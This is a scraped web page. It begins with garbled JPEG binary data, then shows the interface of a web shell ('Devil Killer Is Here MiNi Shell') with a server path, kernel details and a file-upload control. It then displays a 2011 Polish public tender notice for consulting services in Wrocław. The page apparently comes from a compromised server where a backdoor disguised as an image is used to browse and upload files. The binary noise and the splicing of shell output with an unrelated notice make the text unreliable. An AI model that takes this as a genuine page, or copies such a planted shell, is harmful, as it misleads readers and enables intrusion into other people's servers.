JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110418/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20110418/82080-N-2011.html

<p class="kh_header"><b>Wrocław: Usługi doradcze w zakresie przedsiębiorczości związanej z EURO 2012, księgowości, BHP oraz logistyki dla projektu EUROprzedsiębiorca 45+ - Program Operacyjny Kapitał Ludzki - projekt realizowany przez Centrum Integracji Społecznej we Wrocławiu.</b><br>
<b>Numer ogłoszenia: 82080 - 2011; data zamieszczenia: 18.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Integracji Społecznej , ul. Strzegomska 49, 53-611 Wrocław, woj. dolnośląskie, tel. 71 782 35 11, faks 71 782 35 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cis.wroclaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi doradcze w zakresie przedsiębiorczości związanej z EURO 2012, księgowości, BHP oraz logistyki dla projektu EUROprzedsiębiorca 45+ - Program Operacyjny Kapitał Ludzki - projekt realizowany przez Centrum Integracji Społecznej we Wrocławiu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest udzielenie doradztwa indywidualnego i grupowego 
z zakresu przedsiębiorczości związanej z EURO 2012, księgowości, BHP oraz logistyki dla 60 uczestników projektu EUROprzedsiębiorca 45+ - osób niezatrudnionych i zatrudnionych zamieszkałych na terenie Wrocławia.
Przedmiotem zamówienia podzielony został na 4 części: część pierwsza  doradztwo 
z zakresu przedsiębiorczości związanej z EURO 2012, część druga doradztwo 
z zakresu  księgowości, część trzecia doradztwo z zakresu BHP oraz część IV doradztwo z zakresu logistyki.


PRZEDMIOT ZAMÓWIENIA OBEJMUJE NASTĘPUJĄCE CZĘŚCI:

Część I - pod nazwą: 
Doradztwo z zakresu przedsiębiorczości związanej z EURO 2012
1.	Doradztwo grupowe - doradztwo realizowane w grupach - służące pogłębieniu wiedzy z zakresu tematyki poruszanej podczas szkoleń; doradztwo zostanie dopasowane do indywidualnych potrzeb uczestników, w tym np.: w jaki sposób należy przygotowywać wybrane części biznesplanu, jak tworzyć prognozy rachunku zysków i strat (4h/edycję szkolenia (1h=60 minut).
2.	Doradztwo indywidualne - jego celem jest rozwiązywanie indywidualnych problemów przy tworzeniu biznesplanu związanych z planowaną przez uczestników działalnością (średnio 45min na 1 uczestnika)

RAMOWY ZAKRES DORADZTWA
wpływ przygotowań i organizacji EURO 2012 na gospodarkę Dolnego Śląska i Polski,
tworzenie biznesplanu zawierającego plan marketingowy i plan inwestycyjny,
tworzenie harmonogramu rzeczowo - finansowego przedsięwzięcia.

Tematyka doradztwa będzie uzależniona od zapotrzebowania zgłaszanego przez uczestników projektu.
3.	Doradcze wsparcie pomostowe podstawowe -  doradztwo indywidualne z zakresu przedsiębiorczości stanowiące pomoc w efektywnym wykorzystaniu środków finansowych na rozwój przedsiębiorczości oraz prowadzeniem firmy (średnio po 45min/m-c/uczestnika dla max 60 uczestników),
4.	Doradcze wsparcie pomostowe  rozszerzone - Doradztwo indywidualne z zakresu przedsiębiorczości stanowiące pomoc w efektywnym wykorzystaniu środków finansowych na rozwój przedsiębiorczości oraz prowadzeniem firmy (średnio po 45min/m-c/uczestnika dla max 60 uczestników).

Tematyka doradztwa będzie uzależniona od zapotrzebowania zgłaszanego przez uczestników projektu.

Część II - pod nazwą: 
Usługi doradcze z zakresu księgowości
1.	 Doradztwo grupowe - doradztwo realizowane w grupach - służące pogłębieniu wiedzy z zakresu tematyki poruszanej podczas szkoleń; doradztwo zostanie dopasowane do indywidualnych potrzeb uczestników, w tym np.: w jaki sposób należy przygotowywać wybrane części biznesplanu, jak tworzyć prognozy rachunku zysków i strat (4h/edycję szkolenia (1h=60 minut).
2.	Doradztwo indywidualne - jego celem jest rozwiązywanie indywidualnych problemów przy tworzeniu biznesplanu związanych z planowaną przez uczestników działalnością (średnio 45min na 1 uczestnika).

RAMOWY ZAKRES DORADZTWA
formy opodatkowania działalności gospodarczej,
Podatkowa Księga Przychodów i Rozchodów,
podsumowanie miesięczne i roczne zamknięcie KPiR,
dowody księgowe,
aktywa i pasywa,
podatek od towarów i usług,
podatek dochodowy od osób fizycznych,
rozliczanie z US i ZUS,
zagadnienia związane z przygotowaniem biznesplanu.

Tematyka doradztwa będzie uzależniona od zapotrzebowania zgłaszanego przez uczestników projektu.
3.	Doradcze wsparcie pomostowe podstawowe -  doradztwo indywidualne z zakresu księgowości stanowiące pomoc w efektywnym wykorzystaniu środków finansowych na rozwój przedsiębiorczości oraz prowadzeniem firmy (średnio po 1,5h/m-c/uczestnika dla max 60 uczestników)
4.	Doradcze wsparcie pomostowe  rozszerzone - doradztwo indywidualne z zakresu księgowości stanowiące pomoc w efektywnym wykorzystaniu środków finansowych na rozwój przedsiębiorczości oraz prowadzeniem firmy (średnio po 45min/m-c/uczestnika dla max 60 uczestników)

Tematyka doradztwa będzie uzależniona od zapotrzebowania zgłaszanego przez uczestników projektu.

Część III - pod nazwą: 
Doradztwo z zakresu BHP
1.	Doradztwo indywidualne - jego celem jest rozwiązywanie indywidualnych problemów przy tworzeniu biznesplanu związanych z planowaną przez uczestników działalnością (średnio 45min na 1 uczestnika)

RAMOWY ZAKRES DORADZTWA
regulacje prawne z zakresu prawa pracy dotyczące bezpieczeństwa i higieny pracy, organizacja i metody kształtowania bezpiecznych i higienicznych warunków pracy,
ocena zagrożeń w pracy i metody ochrony przed zagrożeniami,
zasady postępowania w razie wypadku w czasie pracy i sytuacjach zagrożeń,
obowiązki i odpowiedzialność pracodawców oraz prawa i obowiązki pracowników wynikające z BHP,
pojęcie zrównoważonego rozwoju i korzyści z niego płynące.

Tematyka doradztwa będzie uzależniona od zapotrzebowania zgłaszanego przez uczestników projektu.
2.	Doradcze wsparcie pomostowe podstawowe -  doradztwo indywidualne z zakresu BHP stanowiące pomoc w efektywnym wykorzystaniu środków finansowych na rozwój przedsiębiorczości oraz prowadzeniem firmy (średnio po 45min/m-c/uczestnika)
3.	Doradcze wsparcie pomostowe  rozszerzone -  doradztwo indywidualne z zakresu BHP stanowiące pomoc w efektywnym wykorzystaniu środków finansowych na rozwój przedsiębiorczości oraz prowadzeniem firmy (średnio po 45min/m-c/uczestnika)

Tematyka doradztwa będzie uzależniona od zapotrzebowania zgłaszanego przez uczestników projektu.

Część IV - pod nazwą: 
Doradztwo z zakresu logistyki
1.	Doradztwo grupowe - doradztwo realizowane w grupach - służące pogłębieniu wiedzy z zakresu tematyki poruszanej podczas szkoleń; doradztwo zostanie dopasowane do indywidualnych potrzeb uczestników.

RAMOWY ZAKRES DORADZTWA
logistyka - jej rola w firmie,
planowanie działań,
zarządzanie łańcuchem dostaw,
standaryzacja i dokumentowanie działań,
organizacja procesów zakupowych i zaopatrzeniowych,
zarządzanie zapasami i przepływami materiałowymi,
rachunek kosztów w logistyce,
problemy z wdrażaniem logistyki do MSP.

Tematyka doradztwa będzie uzależniona od zapotrzebowania zgłaszanego przez uczestników projektu.
2.	Doradcze wsparcie pomostowe podstawowe -  doradztwo indywidualne z zakresu logistyki stanowiące pomoc w efektywnym wykorzystaniu środków finansowych na rozwój przedsiębiorczości oraz prowadzeniem firmy (średnio po 45min/m-c/uczestnika dla max 60 uczestników)
3.	Doradcze wsparcie pomostowe  rozszerzone -  doradztwo indywidualne z zakresu logistyki stanowiące pomoc w efektywnym wykorzystaniu środków finansowych na rozwój przedsiębiorczości oraz prowadzeniem firmy (średnio po 45min/m-c/uczestnika dla max 60 uczestników)

Tematyka doradztwa będzie uzależniona od zapotrzebowania zgłaszanego przez uczestników projektu.


Wymagania odnoście wszystkich części
a)	oznakowania wszystkich prezentacji multimedialnych i materiałów wykorzystywanych podczas doradztwa poprzez umieszczenie logo według wytycznych opisanych w aktualnej wersji Wytycznych dotyczących oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki, która znajduje się na stronie www.pokl.dwup.pl oraz według wytycznych przyjętych dla Systemu Identyfikacji Wizualnej materiałów informacyjnych i promocyjnych Gminy Wrocław dostępnej w Biurze Promocji Miasta, ul. Przejście Żelaźnicze 17a, 50-107 Wrocław (w konsultacji z Zamawiającym) oraz logo projektu. 
b)	zapewnienia kadry o odpowiednim wykształceniu i doświadczeniu w prowadzeniu doradztwa z zakresu przedmiotu zamówienia; poświadczone odpowiednimi dokumentami. 
c)	   przygotowania i prowadzenia dokumentacji doradztwa, w tym list obecności, dzienników, sprawozdań z udzielonego doradztwa;
d)	  niezwłoczne informowanie Zamawiającego imiennie o nieobecności osób skierowanych przez Zamawiającego, nie zgłoszeniu się tych osób w celu udzielenia doradztwa.
Przy kalkulacji ceny ofertowej należy uwzględnić wszystkie koszty niezbędne do należytego wykonania przedmiotu zamówienia. 
Uczestnikami doradztwa w części I, II, III i IV będą osoby niezatrudnione i zatrudnione mieszkańcy Wrocławia.
1. Wymagana ilość godzin:
Cześć I:
1.	Doradztwo grupowe:
4	godziny/ edycję x 3 edycje = 12 godzin (godzina = 60 minut)
2.	Doradztwo indywidualne
15 godzin/ edycję x 3 edycje = 45 godzin (godzina = 60 minut)
3.	Doradztwo pomostowe podstawowe
od 10 godzin do 270 godzin (godzina = 60 minut)
4.	Doradztwo pomostowe rozszerzone 
od 10 godzin do 270 godzin (godzina = 60 minut)

Cześć II:
1.	Doradztwo grupowe:
4 godziny/ edycję x 3 edycje = 12 godzin (godzina = 60 minut)
2.	Doradztwo indywidualne
15 godzin/ edycję x 3 edycje = 45 godzin (godzina = 60 minut)
3.	Doradztwo pomostowe podstawowe
od 10 godzin do 540 godzin (godzina = 60 minut)
4.	Doradztwo pomostowe rozszerzone 
od 10 godzin do 540 godzin (godzina = 60 minut)

Cześć III:
Doradztwo z zakresu BHP
1.	Doradztwo indywidualne
15 godzin/ edycję x 3 edycje = 45 godzin (godzina = 60 minut)
2.	Doradztwo pomostowe podstawowe
od 10 godzin do 270 godzin (godzina = 60 minut)
3.	Doradztwo pomostowe rozszerzone 
od 10 godzin do 270 godzin (godzina = 60 minut)

Cześć IV:
Doradztwo z zakresu logistyki
1.	Doradztwo grupowe
4 godziny/ edycję x 3 edycje = 12 godzin (godzina = 60 minut)
2.	Doradztwo pomostowe podstawowe
od 10 godzin do 270 godzin (godzina = 60 minut)
3.	Doradztwo pomostowe rozszerzone 
od 10 godzin do 270 godzin (godzina = 60 minut)
Harmonogramy: 
Cześć I: 
Doradztwo grupowe, Doradztwo indywidualne	
w dni powszednie i weekendy 
w godzinach 8,00-16,00	VI-VII 2011, X-XI 2011, II-III 2012
		
Doradztwo pomostowe podstawowe IX 2011-X 2012
Doradztwo pomostowe rozszerzone III 2012 - IV 2013
Cześć II: 
Doradztwo grupowe, Doradztwo indywidualne	
w dni powszednie i weekendy 
w godzinach 8,00-16,00	VI-VII 2011, X-XI 2011,II-III 2012
		
Doradztwo pomostowe podstawowe IX 2011-X 2012
Doradztwo pomostowe rozszerzone III 2012 - IV 2013
Cześć III:
Doradztwo indywidualne	w dni powszednie i weekendy 
w godzinach 8,00-16,00	VI-VII 2011, X-XI 2011, II-III 2012

Doradztwo pomostowe podstawowe		IX 2011-X 2012
Doradztwo pomostowe rozszerzone		III 2012 - IV 2013

Cześć IV:
Doradztwo grupowe w dni powszednie i weekendy 
w godzinach 8,00-16,00	VI-VII 2011, X-XI 2011, II-III 2012
Doradztwo pomostowe podstawowe		IX 2011-X 2012
Doradztwo pomostowe rozszerzone		III 2012 - IV 2013

2. Miejsce realizacji przedmiotu zamówienia: 	
Miejscem odbywania - realizacji przedmiotu zamówienia jest siedziba Zamawiającego,   Ul. Strzegomska 49, 53-611 Wrocław,

3. Dokumentacja:
Zamawiający wymaga prowadzenia przez Wykonawcę dokumentacji przekazanej przez Zamawiającego, w tym karty doradztwa, dzienników, sprawozdań z udzielonego doradztwa..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.14.00.00-7, 79.22.10.00-9, 79.41.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie przewidziano</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>część I
Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał  co najmniej cztery usługi doradcze z zakresu przedsiębiorczości w tym  co najmniej 2 z zakresu zakładania działalności gospodarczej oraz co najmniej 2 z prowadzenia działalności gospodarczej.
część II
Wykonawca wykaże, że wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - co najmniej cztery usługi doradcze z zakresu księgowości w tym co najmniej 2 z zakresu księgowości związanej z zakładaniem działalności gospodarczej oraz co najmniej 2 z zakresu księgowości związanej z prowadzeniem działalności gospodarczej.
część III
Wykonawca wykaże, że wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - co najmniej trzy usługi doradcze lub szkoleniowe z zakresu BHP dla pracodawców i osób kierujących pracownikami.
część IV
Wykonawca wykaże, że wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - co najmniej trzy usługi doradcze lub szkoleniowe z zakresu logistyki w MMSP.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>część I
Wykonawca wykaże, że dysponuje osobami:
Co najmniej jedną osobą posiadającą :
1.	wykształcenie wyższe magisterskie lub równorzędne i legitymującą się dyplomem magistra lub równorzędnym w zakresie prawa, rachunkowości, ekonomii lub zarządzania,
2.	udokumentowaną wiedzę i doświadczenie związane z prowadzeniem doradztwa związanych z zakładaniem spółdzielni socjalnych i działalności gospodarczej,
3.	udokumentowaną wiedzę i doświadczenie zawodowe z zakresu analizy finansowej, bilansu, przepływów finansowych, wskaźników ekonomicznych, analizy rentowności przedsiębiorstwa, 
4.	znajomość prawa polskiego i wspólnotowego, w szczególności w zakresie wykorzystywania pomocy de minimis na rozpoczęcie prowadzenia działalności gospodarczej,
5.	praktyczną znajomość zagadnień związanych z prowadzeniem działalności gospodarczej w Polsce
6.	doświadczenie w świadczeniu usług doradczych (udzieliła co najmniej 3 usługi doradcze: 1 z zakresu zakładania działalności gospodarczej oraz 2 z zakresu prowadzenia działalności gospodarczej. 
część II
Wykonawca wykażę, że dysponuje osobami:
Co najmniej jedną osobą posiadającą:
1.	wykształcenie wyższe magisterskie kierunkowe lub równorzędne,
2.	posiada uprawnienia - certyfikat księgowego wydany na podstawie art. 76b ust. 1 pkt. 3 lit. B ustawy z dnia 29.09.1994r. o rachunkowości potwierdzający kwalifikacje i uprawnienia do usługowego prowadzenia ksiąg rachunkowych lub równorzędny,
3.	posiada udokumentowaną wiedzę i doświadczenie zawodowe z zakresu księgowości
4.	znajomość prawa polskiego i wspólnotowego, w szczególności w zakresie wykorzystywania pomocy de minimis na rozpoczęcie prowadzenia działalności gospodarczej,
5.	udzieliła co najmniej 4 usługi doradcze z zakresu księgowości związanej z - 2 z zakresu księgowości związanej z zakładaniem działalności gospodarczej oraz 2 z zakresu księgowości związanej z prowadzeniem działalności gospodarczej.
6.	posiada praktyczną znajomość zagadnień związanych z prowadzeniem działalności gospodarczej w Polsce.
część III
Wykonawca wykaże, że dysponuje osobami:
Co najmniej jedną osobą posiadającą:
1.	studia podyplomowe z zakresu BHP,
2.	roczny staż na stanowisku specjalisty BHP,
3.	udzielone minimum 2 usługi doradcze lub szkoleniowe z zakresu BHP dla pracodawców i osób kierujących pracownikami,
4.	posiada praktyczną znajomość zagadnień związanych z prowadzeniem działalności gospodarczej w Polsce.
część IV
Wykonawca wykaże, że dysponuje osobami:
Co najmniej jedną osobą posiadającą:
1.	wykształcenie wyższe magisterskie kierunkowe lub równorzędne,
2.	minimum roczne doświadczenie na stanowisku logistyka w MMSP,
3.	udzieloną minimum jedną usługę doradczą lub szkoleniową z zakresu logistyki dla MMSP,
4.	posiada praktyczną znajomość zagadnień związanych z prowadzeniem działalności gospodarczej w Polsce.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dokumenty potwierdzające należyte wykonanie usług wymieniownych w wykazie usług, dokument (np. pełnomocnictwo lub umowa spółki cywilnej, itp.) potwierdzający, iż oferta została podpisana przez osobę/y uprawnioną/e w reprezentowania Wykonawcy, jeżeli nie wynika to z innych dokumentów załączonych do oferty</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cis.wroclaw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Integracji Społecznej
ul. Strzegomska 49 53-611 Wrocław
parter - SEKRETARIAT.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2011 godzina 14:00, miejsce: Centrum Integracji Społecznej
ul. Strzegomska 49 53-611 Wrocław
parter - SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Program Operacyjny Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
